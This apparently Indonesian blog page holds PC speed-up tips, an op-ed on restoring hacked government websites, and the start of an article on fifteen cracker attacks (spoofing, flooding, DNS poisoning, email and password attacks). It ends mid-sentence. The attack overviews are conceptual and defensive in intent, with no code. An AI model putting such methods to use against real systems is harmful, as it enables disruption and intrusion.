Setiap komputer Windows rentan terhadap virus apalagi yang basis Windows XP. Virus adalah program kecil yang jahat yang menyebabkan masalah baik besar dan kecil bagi pengguna. Spyware dan Adware adalah program yang dibuat oleh perusahaan untuk mengetahui informasi lebih lanjut tentang pelanggan. Biasanya program ini tidak dibuat untuk tujuan berbahaya. Spyware dan Adware berada dalam memori komputer dan akan memperlambatnya. Scanning berkala dan penghapusan Virus, Spyware dan Adware merupakan cara terbaik untuk meningkatkan kinerja komputer.

5. Uninstall Program yang tidak digunakan

Seiring waktu, Anda mungkin telah mengumpulkan program-program di komputer Anda yang tidak Anda gunakan. Ketika program terinstal, menciptakan hubungan antara program dan sistem operasi. Bahkan jika Anda tidak menggunakan program-program ini, mereka dapat memperlambat sistem anda. Jika Anda memiliki disk instalasi program asli atau file, menghapus program ini akan membebaskan ruang pada komputer Anda dan dapat mempercepat kinerja sistem Anda.

6. Mengatur Efek Visual ke posisi Best Performance

Windows menyediakan beberapa efek visual yang menarik termasuk jendela animasi dan menu memudar. Jika Anda tidak memiliki cukup memori operasi (lihat nomor 1 di atas), efek ini dapat memperlambat komputer Anda. Menyesuaikan atau mengurangi efek visual dapat membuat perbedaan. Untuk mempercepat Vista di komputer tertentu Anda dapat menonaktifkan fitur dan fungsi yang tidak digunakan. Untuk informasi lebih lanjut, baca “Bagaimana mempercepat Windows Vista.”

7. Jangan jalankan suatu Programs secara otomatis saat Start Up.

Program menggunakan operasi memori (RAM, juga disebut sumber daya sistem). Kecuali Anda selalu menggunakan suatu program, Anda dapat menjaga mereka dari loading pada startup Windows. Tetapi jika jarang digunakan lebih baik non aktifkan saja dari auto start. Caranya adalah klik [Start] lalu pilih [Run] untuk XP lalu ketik msconfig.exe lalu [Enter]. Untuk Vista cukup ketik msconfig lalu [Enter]. Kemudian klik tab [Start Up] dan lihatlah mana saja program yang sangat jarang digunakan hapuslah tanda centangnya.

8. Defragment Hard Drive Anda (Setelah Anda mencoba segala sesuatu yang lain)

Semakin banyak informasi dan program yang Anda miliki di komputer Anda, semakin besar kemungkinan bahwa Windows telah menempatkan bagian-bagian file yang sama di lokasi yang berbeda pada hard drive Anda. Ini mungkin melakukan hal ini untuk ratusan file dan program, tergantung pada seberapa banyak ruang yang tersedia. Defragmenting hard drive tempat semua informasi untuk setiap file dalam satu tempat. Hasilnya adalah komputer lebih cepat. Mengenai defragment harddisk sudah pernah saya bahas secara terpisah. Intinya mempercepat komputer bukanlah pekerjaan yang susah.

sumber : Detik.com

Read More

Menyikapi Situs Yang Diobrak-abrik Hacker

Jakarta - Akhir-akhir ini marak terjadi penyerangan (penyusupan) ke situs pemerintah bahkan situs POLRI juga tidak luput dari serangan tersebut. Mengenai alasan mengapa situs-situs tersebut diserang menurut saya bukanlah suatu yang layak dibahas secara Telematika karena bila bicara mengenai alasan maka topik bahasannya bisa dari A sampai Z, begitupun kemungkinan pelakunya bisa si A sampai si Z.
Sebenarnya yang perlu dilakukan cukup fokus terhadap apa yang dihadapi dan mencari solusi sesuai tahapan yang benar. Kita tidak perlu sesali bila situs kena hack, justru itu menjadi feed-back bagi kita bahwa situs kita belum terlindungi dengan benar dan perlu ada pembenahan, perlu ada pembelajaran.
Lalu pertanyaan berikut adalah mengapa situs D,E & F yang kena incar bukan X,Y & Z?
Di luar dugaan kemungkinan adanya niatan dari pihak tertentu (non teknis) salah satu jawaban paling logis dalam dunia hacking adalah apabila suatu metoda berhasil membobol suatu situs maka cara yang termudah untuk kembali sukses membobol situs lain pasti dengan mencari situs yang menggunakan cara yang sama seperti yang berhasil dibobol sebelumnya tersebut, betul bukan?
Hal itu karena tantangan (baca: kebanggaan) membobol situs pemerintah bukanlah kepada "seberapa sulit" bisa melakukan penerobosan melainkan "seberapa banyak" yang berhasil dibobol.
Ironisnya kenyataan yang ada di lapangan justru sangat membuka peluang untuk itu karena walau proyek-proyek pengadaan situs menghabiskan biaya yang tidak sedikit tapi ternyata situs yang terpasang sering kali sangat rentan atau misal menggunakan framework dari sumber yang sama dan banyak di internet.
Dengan demikian pasti memiliki kerentanan yang sama dan lebih parahnya lagi sangat umum terjadi pada situs pemerintah bahwa kurangnya kesadaran untuk memelihara situs (melakukan patching, upgrade), ini yang lazim terjadi walau tentu tidak mengeneralisir bahwa semua pengelola situs pemerintah seperti ini.
Hal lain tapi tidak dipungkiri bahwa maraknya pembobolan ini sangat mungkin dimanfaatkan oleh oknum tertentu untuk menjadikan "musibah massal" ini sebagai alasan mendapat proyek perbaikan situs, jadi tetap mungkin saja (walau tidak bermaksud menuduh) suatu situs dibobol oleh orang dalam sendiri.
Adapun pembuktian pencarian pelaku pembobol apakah itu dilakukan orang dalam atau luar sepenuhnya menjadi tugas kepolisian yang tentu mungkin bisa terlacak dengan rekam jejak, log, analisa alur akses, pemeriksaan setting firewall (bila ada) dan sebagainya. Namun itu semua secara Telematika tidak terlalu berarti karena pada akhirnya hanya upaya pencari pelakunya. Ketemu atau tidak ketemu pelakunya toh situsnya sudah "terkapar" dan perlu dipulihkan.
Yang perlu dilakukan pengelola situs adalah selain membantu pihak kepolisian dengan memberikan berbagai informasi yang dibutuhkan (guna pelacakan pembobol) pengelola situs harus segera melakukan perbaikan situs agar dapat kembali melayani masyarakat.
Tanpa bermaksud menganggap remeh situs yang dimiliki pemerintah tapi pada umumnya isinya (walau dinamik) sekedar informasi elektronik mengenai lembaga / institusi / departemen yang bersangkutan dan belum sampai ke data penting dan hal lain yang kelak mengganggu operasional dan merugikan Negara.
Sehingga untuk pemulihan situs dengan karakter seperti ini bukanlah hal yang sulit dilakukan (bagi yang paham dan berpengalaman), tidak butuh berhari-hari dan tidak akan mengeluarkan dana banyak. Salah satu contoh logis, sejauh apapun yang bisa dilakukan si hacker namun secara fisik aksesibilitas terhadap server tentu 100% ada pada kuasa pengelola dan begitu pula super user password (atau admin password).
Itu sudah cukup menjadi kunci sukses utama dalam pemulihan. Misal ternyata bahkan akses ke Super User itupun telah diambil alih si hacker maka pengelola dapat mengatasi dengan mengganti harddisk dengan yang lain dan 100% pengaruh si hacker sudah musnah dari server tersebut. Tidak rumit bukan?
Formulasi Langkah 5 R
Selanjutnya pihak pengelola cukup melakukan langkah yang saya formulasikan dengan istilahkan 5R --agar mudah diingat-- yaitu Recovery, Rebuild, Restore, Resolve dan Retain sebagai berikut:
Recovery
Upaya pengambilan data bergerak yang mungkin ada dari sejak terakhir backup dilakukan termasuk diantaranya semua file yang bersifat log atau hal yang bisa membantu yang berwajib untuk melakukan pelacakan pelaku. Anggap pekerjaan ini membutuhkan 2 jam.
Rebuild
Ini adalah upaya pembangunan kembali struktur sistem bisa sekedar pada tingkat aplikasi web yang mungkin hanya beberapa menit saja. Misal keadaan yang terjadi sangat parah sehingga tahap ini harus dari tahap instalasi sistem operasi maka baik pada Linux atau Windows server tahap instalasi dan setting bisa dilakukan (secara tidak terburu-buru) diprakirakan menghabiskan waktu sekitar 2 jam.
Kemudian dilanjutkan dengan instalasi piranti lunak atau tools yang biasa digunakan, waktunya tergantung dari jumlah piranti yang diperlukan untuk direinstalasi. Dalam melakukan ini skala prioritas sangat berguna yakni utamakan yang penting dan sangat diperlukan segera ada dan selebihnya bisa dilakukan setelah tahapan 5R ini selesai.
Restore
Ini adalah pengembalian database dari file backup. Tentu keberhasilan ini tergantung dari kerajinan pengelola melakukan backup baik full-backup (Differential) maupun update-backup (Incremental). Apabila ternyata pengelola tidak memiliki backup maka saya pribadi lebih menganjurkan agar pengelola tersebut diberi sanksi yaitu diganti oleh pihak lain.
Mungkin hal itu terlihat sangat ekstrim tapi patut diketahui bahwa kelalaian melakukan backup adalah suatu hal yang tidak boleh ditolerir dengan alasan apapun dan menjadi tugas utama pengelola situs.
Dengan analogi sopir maka dia tidak boleh memarkir kendaraan pada lokasi yang retan kecelakaan atau kehilangan bukan? Dapat dikatakan anggaplah pengelola situs (server admin / db admin / web admin / webmaster dan segala posisi yang terkait dengan pekerjaan tersebut) utamanya digaji hanya untuk backup data dan selebihnya itu sekedar tugas tambahan J. Yang ingin ditekankan adalah apalah arti kerja berbulan-bulan apabila tidak dapat menyimpan pekerjaannya tersebut secara baik.
Tentu disini penting juga langkah rutin latihan restore, sebagai bagian dari DRP (Disaster Recovery Plan) bahwa data yang dibackup harus dipastikan dapat dipulihkan (restorable). Durasi pekerjaan ini tergantung dari besarnya backup yang dimiliki dan jenis restore yang dilakukan.
Resolve
Menuntaskan tahapan pemulihan dengan melakukan pengujian dan pemastian bahwa segalanya telah kembali normal (atau lebih baik dari kondisi sebelumnya) atau setidaknya pemulihan telah sampai pada tingkat yang dapat dipertanggungjawabkan atau diterima oleh pimpinan, lalu dipastikan sistem pelindung telah terpasang dan diaktifkan, patch yang diperlukan telah dipasang. Bila semua dinyatakan "SIAP" maka layanan ini bisa segera dibuka kembali.
Pada tahap ini sangat diperlukan adanya pencatatan mengenai apa yang dipasang, ditingkatkan, perbedaan dengan setting terdahulu. Sehingga apabila terjadi penyerangan berikut maka pengelola tidak perlu melakukan fall-back (atau kembali ke sistem sebelum tahap 5R) melainkan cukup mengulang tahapan 5R dengan benar, mungkin saja ada langkah yang terlupa atau ada langkah mendetil yang terlewati.
Retain
Secara parallel (karena situs telah dibuka kembali) dilakukan pengujian terhadap situs untuk dipastikan bahwa setidaknya situs tidak akan rubuh dengan modus operandi yang sama dan juga diuji dengan cara lainnya.
Tahap 5R ini bukan jaminan bahwa sistem akan lebih kuat karena dalam dunia ICT tidak ada istilah lebih kuat. Yang perlu diutamakan bukan sekedar keamanan (Secure) tetapi juga kecepatan (Speed), stabil (Stable) dan lancar (Smooth) keempat ini bisa diingat dengan istilah 4S (lagi-lagi ini bukan istilah baku namun agar mudah mengingatnya) dan perlu disadari dibalik sistem ICT tersebut adalah manusia yang mungkin lalai melakukan semua tahapan tersebut secara mendetil dan benar walau sudah diterapkan SOP (Standard Operating Procedure).
Sehingga control berupa check-recheck akan sangat membantu. Tahapan 5R ini setidaknya dapat memberikan panduan kepada pengelola situs untuk tidak panik lalu malah melakukan banyak langkah yang tidak perlu dan justru lupa pada skala prioritas manfaat dan kepentingan situs tersebut.
Semoga informasi ini bermanfaat untuk kita semua dan membuat liat lebih sering belajar dalam melakukan trouble shooting yang baik, dan pesan ini untuk kita semua termasuk untuk diri saya sendiri.
*Penulis: Abimanyu Wachdjoewidajat merupakan akademisi dari UIN Syarif Hidayatullah serta praktisi telematika. Ia bisa dihubungi melalui blog http://awam.multiply.com.

sumber : Detik.com

Read More

15 Jenis Serangan Cracker

Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan
menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang keamanan.
Tools maupun teknik yang digunakan cracker kebanyakan adalah variasi dari serangan yang mereka
lakukan sebelumnya. Sebagai Administrator baik system maupun jaringan ataupun end user, Anda
haruslah banyak belajar dari pengalaman penyerangan yang terjadi sebelumnya (walaupun serangan
tersebut terjadi pada orang lain) untuk menghindari serangan yang akan terjadi berikutnya.
Mengetahui jenis serangan sangat penting untuk menjaga stabilitas system, sehingga anda tidak perlu
repot untuk menginstall system baru agar lebih aman, anda hanya perlu mempatch atau bahkan sedikit
mengkonfigurasi system anda Mungkin bagi beberapa orang tulisan ini merupakan tulisan yang sangat
mendasar, tapi tidak ada salahnya jika anda sebagai seorang Profesional untuk mereview sesuatu yang
dasar dari waktu ke waktu.. Artikel ini bukan ditujukan untuk menyerang tetapi sebaliknya yaitu untuk
bertahan, karena menurut hemat saya untuk bertahan anda harus tahu cara menyerang. Dalam artikel ini
terdapat serangan yang sering dilakukan oleh cracker dan disetiap serangan mempunyai metode-metode
tersendiri, contohnya saja dalam melakukan IP spoofing yang mempunyai banyak metode diantaranya
man in the middle attack. Dengan alasan diatas saya akan mencoba menggaris besarkan seranganserangan
umum yang sering dilakukan cracker dan harus diketahui oleh seorang Administrator maupun
end user, sedangkan metode-metode yang lebih spesifik mungkin akan saya tuangkan dalam tulisan saya
berikutnya baik itu penyerangan ataupun metode yang dilakukan untuk bertahan. Saya tahu tulisan berikut
adalah jauh dari sempurna, untuk itu saran dan kritik sangat saya harapkan.
1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

Protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet
Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi
dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)
dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan
pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi
Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.
Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan
dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak
mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source
yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain,
Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya
sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.
Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak
packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan
setiap serangan spoofing.
2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem
3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.
Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang
digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of
Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles
ketika serangan ini dijalakan melewati UDP.
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers,
tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap
network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di
amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti
satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang
pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan
jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.
TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk
menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service).
Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang
dengan cara ini.
Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk
menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS
akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara
berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara
mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan
oleh system yang sudah terkena serangan sangat parah).
5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.
Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang
dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan
menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika
terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali.

Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak
pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content –
based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk
perusakan dan pembobolan.
Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali
menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network
tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters)
yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara
ini.
6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker
kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi
antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding
merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi
down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi
fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi
email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang
berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set
untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate
lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.
Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system
menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang
diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood
dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu
memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin
tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command
yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk
memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.
Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-
an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker
dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload
lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian
ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell
dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga
sering terjadi pada POP dan IMAP.
Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan
tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood.
Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang
attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong
lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu
organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan
sumber dan alamat dari organisasi tersebut.
Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan
dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat
broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail

dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan
disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai
Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke
users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap
attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.
Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara
melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat
admin agar users mengirimkan passwordnya untuk mengupgrade system.
7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).
Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa
kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya
beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap
system dan melakukan perintah dengan hak penuh (command execution priviledge).
Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang
berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet
Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak
ada hal mudah lainnya yang menyangkut internet.
Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address
translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat
informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking.
Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari
jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning,
yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain
dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi.
Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil
dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).
DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang
dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya
menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive
name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area,
maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.
Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah
satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya
kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk
memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi
telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan
compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini
stidaknya membuat cracker akan sulit menggunakan exploit.
Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang
harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan
patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara
berkala, tentunya untuk menjaga kemanan system.

Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode
mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka
file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin.
Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti
server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache
poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain
hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network
infrastucture sebelum mengganti server yang lama.
8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.
Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara
manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang
umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang
aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7
karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat
mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit
angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi
mudah andai saja mereka lupa untuk merubah password default dari sebuah software.
Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan
waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login
dengan menebak password berkali-kali.
Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi
